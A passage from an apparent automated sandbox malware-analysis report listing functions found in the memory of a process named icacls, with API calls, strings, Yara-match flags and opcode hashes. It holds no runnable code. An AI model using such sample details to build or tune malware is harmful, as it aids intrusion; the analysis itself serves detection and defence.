                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5030aeaf2a0cd19328fddbdd7abb83dbf8d37b43fa7cc9f6071e85088df030dc
                                                                                                        • Instruction ID: 7a51aa20612d7814b00cc6b7cfbfdca5c3614b2ea0bb8955ba69cb1d6bebfce9
                                                                                                        • Opcode Fuzzy Hash: 5030aeaf2a0cd19328fddbdd7abb83dbf8d37b43fa7cc9f6071e85088df030dc
                                                                                                        • Instruction Fuzzy Hash: A690026560550902E101B1584408616005E87D1241F95C022B102C555ECB258A96B131
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e4eac9761efce08adb851b79d23993b10da738c41717753fd8b4b2c67f51fd87
                                                                                                        • Instruction ID: 8a3373e938c6cc3d3e8d524d905d03cdab2440818f56f0a59153a800ea37ac85
                                                                                                        • Opcode Fuzzy Hash: e4eac9761efce08adb851b79d23993b10da738c41717753fd8b4b2c67f51fd87
                                                                                                        • Instruction Fuzzy Hash: 4C9002A520590803E140B5584808607005987D1302F55C011B206C555E8B298D557135
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 90bfc9913170ffd5dfbac011fb3bc5d7c842c9127fff976eac539ebe494d729e
                                                                                                        • Instruction ID: 6bd46dc498d79c7ba3346b23aebf6e1fbf424d5147a0993e8823336ee48d2b1e
                                                                                                        • Opcode Fuzzy Hash: 90bfc9913170ffd5dfbac011fb3bc5d7c842c9127fff976eac539ebe494d729e
                                                                                                        • Instruction Fuzzy Hash: 43900265246545526545F1584408507405A97E1241795C012B141C950C8626995AE621
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6fb7f03f2b23caafcd0264ef52677fc94ce3df190393ad62a738848d3570bf1b
                                                                                                        • Instruction ID: 1bc82b76b12b17c0a462c6d56193a3cfd3185eef1cbeda2ff40a08cef8b36837
                                                                                                        • Opcode Fuzzy Hash: 6fb7f03f2b23caafcd0264ef52677fc94ce3df190393ad62a738848d3570bf1b
                                                                                                        • Instruction Fuzzy Hash: 6990027520550813E111B1584508707005D87D1241F95C412B042C558D97568A56B121
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: a2e1ec9b598ebbf34b758ec3c263d04614d3e33ccf627c3f8a107eb079d7275c
                                                                                                        • Instruction ID: 151b40a74abc8eac6d07776726d7dd3b61f42f8a8c52c8d10922e943690078f4
                                                                                                        • Opcode Fuzzy Hash: a2e1ec9b598ebbf34b758ec3c263d04614d3e33ccf627c3f8a107eb079d7275c
                                                                                                        • Instruction Fuzzy Hash: 6390026D21750402E180B158540C60A005987D2202F95D415B001D558CCA15896D6321
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                                                                                        • Instruction ID: 4d5cb88fcb9aaca86b4eeae3b848100249106da5b1d884473dab1726db4d056d
                                                                                                        • Opcode Fuzzy Hash: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                                                                                        • Instruction Fuzzy Hash: 0D90026530550403E140B158541C6064059D7E2301F55D011F041C554CDA15895A6222
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                                                                                        • Instruction ID: 90f9624f825bf7237fea5a20dacd3c5df55794478c9084198d09e5465dc2aa5c
                                                                                                        • Opcode Fuzzy Hash: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                                                                                        • Instruction Fuzzy Hash: EC90027520550802E100B598540C646005987E1301F55D011B502C555EC76589957131
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                                                                                        • Instruction ID: dd18e2e52b5581243676347acb3fb548249b7245e213132097ffca177fd0e976
                                                                                                        • Opcode Fuzzy Hash: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                                                                                        • Instruction Fuzzy Hash: 6590027520558C02E110B158840874A005987D1301F59C411B442C658D879589957121
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                                                                                        • Instruction ID: f5614a289e56e2b8a2499c1e64956399490f12b58b6cc8add09c972754b4a413
                                                                                                        • Opcode Fuzzy Hash: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                                                                                        • Instruction Fuzzy Hash: 7C90027520550C42E100B1584408B46005987E1301F55C016B012C654D8715C9557521
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 039235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6bcdece0913c9f1d9ba7f337a33d378e7d7f693bc6787f734571a1c1730de755
                                                                                                        • Instruction ID: 4f24faa7dd3f353476b84bdc1d78932e007f1e3b36cb88b568d080f836c74822
                                                                                                        • Opcode Fuzzy Hash: 6bcdece0913c9f1d9ba7f337a33d378e7d7f693bc6787f734571a1c1730de755
                                                                                                        • Instruction Fuzzy Hash: 1E90027560960802E100B1584518706105987D1201F65C411B042C568D87958A5575A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 039239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ddbb4d465ce140364d86204897d5b7cec958bc41700b554c80bd3fe1637fe622
                                                                                                        • Instruction ID: 9885a72ea57494115d26372a91baad531ee3a80d8a5ecf4d4ebe52fa9a114632
                                                                                                        • Opcode Fuzzy Hash: ddbb4d465ce140364d86204897d5b7cec958bc41700b554c80bd3fe1637fe622
                                                                                                        • Instruction Fuzzy Hash: 3690026524955502E150B15C44086164059A7E1201F55C021B081C594D865589597221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030CFE08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 7273775570aa4973de71e31bd764de8f1869963554c5473c057e35e5fb4101c6
                                                                                                        • Instruction ID: 7a781df7129fcd3b4513c5edbed0f4d54f22bc110fc557ca527fb0e49fc1ae51
                                                                                                        • Opcode Fuzzy Hash: 7273775570aa4973de71e31bd764de8f1869963554c5473c057e35e5fb4101c6
                                                                                                        • Instruction Fuzzy Hash: CA01A1B6D4125C7ADB10EBE18C81DEFBB7CDF80694F058468F914AB141D6685E068BB2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030CFE10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 585 30cfe10-30cfe22 586 30cfe2a-30cfe77 call 30e9c90 call 30d3780 call 30c1410 call 30e0580 585->586 587 30cfe25 call 30e9280 585->587 596 30cfe79-30cfe88 PostThreadMessageW 586->596 597 30cfe97-30cfe9d 586->597 587->586 596->597 598 30cfe8a-30cfe94 596->598 598->597
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 8cf8e5ec6f9f4bbde20132f79f47a2302329d8e04282672020436f59dca88a03
                                                                                                        • Instruction ID: f67a8008c9f3cb51c99d9b2d15e881d1f99c28b3ed72e9eac85a8706ea6d74cb
                                                                                                        • Opcode Fuzzy Hash: 8cf8e5ec6f9f4bbde20132f79f47a2302329d8e04282672020436f59dca88a03
                                                                                                        • Instruction Fuzzy Hash: 4101C4B6D4135C7EDB10EBE58C81DEFBBBCDF80694F048068F904AB140D6685E0687B2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030CFDC6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 599 30cfdc6-30cfe2f 601 30cfe35-30cfe77 call 30d3780 call 30c1410 call 30e0580 599->601 602 30cfe30 call 30e9c90 599->602 609 30cfe79-30cfe88 PostThreadMessageW 601->609 610 30cfe97-30cfe9d 601->610 602->601 609->610 611 30cfe8a-30cfe94 609->611 611->610
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 524a486fda631dcc81c5d6072e14d6123c50826885dab43a374335f0c6635e4e
                                                                                                        • Instruction ID: 7b8cf86388dfa27b131ca8d943f9bd7aa4f082029afa456058e65b568a766125
                                                                                                        • Opcode Fuzzy Hash: 524a486fda631dcc81c5d6072e14d6123c50826885dab43a374335f0c6635e4e
                                                                                                        • Instruction Fuzzy Hash: 7001DBB6D022997ADB01DBA09C85DEFBF7CDE81554B05C4D9EC04AB101D6785E068BF2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030CFDBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: d4a5a04df0eb4a4c5d140f12d75123d893afe1d4011d1849076405c49bb33f6a
                                                                                                        • Instruction ID: ef9ca4e6b70916b01c9c76fd410f17681f1a3ad5505daf66a06a56f5ebf7625b
                                                                                                        • Opcode Fuzzy Hash: d4a5a04df0eb4a4c5d140f12d75123d893afe1d4011d1849076405c49bb33f6a
                                                                                                        • Instruction Fuzzy Hash: 6F01D4B79423597ADB11DB909C80DEFBBBCEF80694F058499E914AB100D6785E068BF2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E1E60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 030E1F2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: 92ace89865d140049014dcf141c416d7b768cf9f52082924a87b40385ed51a65
                                                                                                        • Instruction ID: cfe15dd3b10f6962d12b42957151c06cc7a14c6f5d88442b7e3af3acda43c534
                                                                                                        • Opcode Fuzzy Hash: 92ace89865d140049014dcf141c416d7b768cf9f52082924a87b40385ed51a65
                                                                                                        • Instruction Fuzzy Hash: 46318DB6602704BFD718DF65D880FEBFBACEB88700F00851DEA199B241D774A644CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030DDEC7 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 030DDEE7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                        • Opcode ID: 33c11e6ced66ee5eb4b8faf5306a30fe0c772c78fd8f2e4d45bafe20c853cc1c
                                                                                                        • Instruction ID: db092bca2b5c479647c5347859eb8d405640e6bccfeaaedb5e62bd4fb589f6cd
                                                                                                        • Opcode Fuzzy Hash: 33c11e6ced66ee5eb4b8faf5306a30fe0c772c78fd8f2e4d45bafe20c853cc1c
                                                                                                        • Instruction Fuzzy Hash: A4314DB6A0070AAFDB10DFD8D8809EEB7B9FF88304B108559E515EB214D775EE05CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030DDED0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 030DDEE7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                        • Opcode ID: 5568433529477f334ccbb5633daab49b707998d2b4eb031503f1c422851cdb9d
                                                                                                        • Instruction ID: 0130e381ef7a4a5ea9a8aa2352c40e2ad519ece4a79231939a8ff6b6913e2cb3
                                                                                                        • Opcode Fuzzy Hash: 5568433529477f334ccbb5633daab49b707998d2b4eb031503f1c422851cdb9d
                                                                                                        • Instruction Fuzzy Hash: D8312CB6A0070AAFDB00DFD8D8809EEB7B9FF88304B108559E515AB214D775EE45CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030D3780 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030D37F2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: ff648a7789903fbada3fb52f9b5746c9afea51872dfecb5c18f95975c9bae672
                                                                                                        • Instruction ID: 624d77bef8d5b691f0c99aa8e28b4a1cb9314b4fb8148c9b413ef4e23934f562
                                                                                                        • Opcode Fuzzy Hash: ff648a7789903fbada3fb52f9b5746c9afea51872dfecb5c18f95975c9bae672
                                                                                                        • Instruction Fuzzy Hash: 4C011EBAE0120DABDF10DAA4DC41FDEB3B89B84608F0441D5A9089B240F631E718CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7700 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(030D02B0,030D02D8,030D00B0,00000000,030D7023,00000010,030D02D8,?,?,00000044,030D02D8,00000010,030D7023,00000000,030D00B0,030D02D8), ref: 030E7763
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 3e1e5d8367b28432de3d2a30821f0afc26a106ba44b202ab9bceca1cb856d585
                                                                                                        • Instruction ID: 27b1002c719cdc0fa77a276b49603734888ce74dab72a76761bd2c260fc691c7
                                                                                                        • Opcode Fuzzy Hash: 3e1e5d8367b28432de3d2a30821f0afc26a106ba44b202ab9bceca1cb856d585
                                                                                                        • Instruction Fuzzy Hash: 5F01A2B6211108BBCB14DF99DC90EDB77ADAF8C754F008208BA09E7240D630E8518BA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030C9080 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030C90C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 76d11a0d25c0c686e880c582571f7119c5ddc0d319802469c952e2478e674bc5
                                                                                                        • Instruction ID: dd2b8cff1417377470fa4140a68cf423b170e425e503da8df4785b1b3eb1ab5a
                                                                                                        • Opcode Fuzzy Hash: 76d11a0d25c0c686e880c582571f7119c5ddc0d319802469c952e2478e674bc5
